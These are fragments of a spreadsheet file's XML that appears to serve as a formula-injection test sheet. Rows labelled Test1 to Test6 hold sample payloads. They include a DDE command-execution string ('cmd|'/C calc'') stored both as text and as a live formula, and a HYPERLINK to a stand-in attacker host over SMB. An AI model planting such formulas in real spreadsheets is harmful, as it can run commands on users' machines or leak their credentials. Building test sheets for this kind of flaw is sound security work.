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 Injection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Payload</t>
        </is>
      </c>
    </row>
    <row r="2">
      <c r="A2" t="inlineStr">
        <is>
          <t>Test1</t>
        </is>
      </c>
      <c r="B2">
        <f>2+2</f>
        <v/>
      </c>
    </row>
    <row r="3">
      <c r="A3" t="inlineStr">
        <is>
          <t>Test2</t>
        </is>
      </c>
      <c r="B3" t="inlineStr">
        <is>
          <t>@SUM(1,1)</t>
        </is>
      </c>
    </row>
    <row r="4">
      <c r="A4" t="inlineStr">
        <is>
          <t>Test3</t>
        </is>
      </c>
      <c r="B4" t="inlineStr">
        <is>
          <t>+cmd|'/C calc'!A0</t>
        </is>
      </c>
    </row>
    <row r="5">
      <c r="A5" t="inlineStr">
        <is>
          <t>Test4</t>
        </is>
      </c>
      <c r="B5">
        <f>cmd|'/C calc'!A0</f>
        <v/>
      </c>
    </row>
    <row r="6">
      <c r="A6" t="inlineStr">
        <is>
          <t>Test5</t>
        </is>
      </c>
      <c r="B6">
        <f>HYPERLINK("http://example.com","Click Here")</f>
        <v/>
      </c>
    </row>
    <row r="7">
      <c r="A7" t="inlineStr">
        <is>
          <t>Test6</t>
        </is>
      </c>
      <c r="B7">
        <f>HYPERLINK("\\attacker-ip\share","SMB Test")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2026-04-08T03:43:30Z</dcterms:created>
  <dcterms:modified xmlns:dcterms="http://purl.org/dc/terms/" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:type="dcterms:W3CDTF">2026-04-08T03:43:30Z</dcterms:modified>
</cp:coreProperties>
</file>